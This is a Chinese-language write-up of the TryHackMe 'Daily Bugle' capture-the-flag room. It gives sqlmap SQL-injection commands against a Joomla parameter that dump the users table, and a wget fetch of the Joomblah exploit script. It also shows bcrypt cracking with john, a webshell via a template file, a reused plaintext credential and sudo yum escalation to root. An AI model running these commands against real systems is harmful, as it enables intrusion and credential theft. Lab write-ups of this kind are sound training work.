【THM】Daily Bugle-Practice
【THM】Daily Bugle-Practice
hihopkcObtain user and root
1 | ┌──(root㉿kali)-[~] |
1 | Nmap scan report for 10.10.205.185 |
由扫描结果得知:目标站点使用的CMS应该是Joomla CMS,并且还开启了mysql服务
使用gobuster扫描目录
1 | ┌──(root㉿kali)-[~] |
或者访问/robots.txt
使用joomscan针对目标站点进行扫描,joomscan是一个专门用于扫描Joomla CMS的工具。
1 | joomscan -u http://10.10.205.185 #此处ip为目标ip |
https://www.exploit-db.com/exploits/42033
可以看到有sql漏洞
1 | sqlmap -u "http://10.10.205.185/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] |
1 | sqlmap -u "http://10.10.205.185/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --tables -D joomla |
1 | sqlmap -u "http://10.10.205.185/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --columns -D joomla -T '#__users' |
1 | sqlmap -u "http://10.10.205.185/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -C username -D joomla -T '#__users' --dump |
sqlmap太慢了
用另一个脚本
1 | wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py |
1 | [-] Fetching CSRF token |
查询上述hash值的加密方式( https://hashcat.net/wiki/doku.php?id=example_hashes )并使用john工具进行hash破解(需要提前将hash值保存为txt文件)
1 | john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt |
访问
1 | 10.10.205.185/templates/beez3/index.php |
我们在网站目录下的configuration.php文件中发现一个凭据:nv5uz9r3ZEDzVjNu
继续使用当前shell界面,尝试通过刚才获取的凭据来切换用户身份
由上述结果可知:用户 jjameson可以以 sudo 身份运行 yum命令
为了方便操作,我们可以通过ssh连接到jjameson用户(登录凭证和前面的相同),然后再复制以上提权命令到ssh界面直接执行,即可得到root shell。
评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果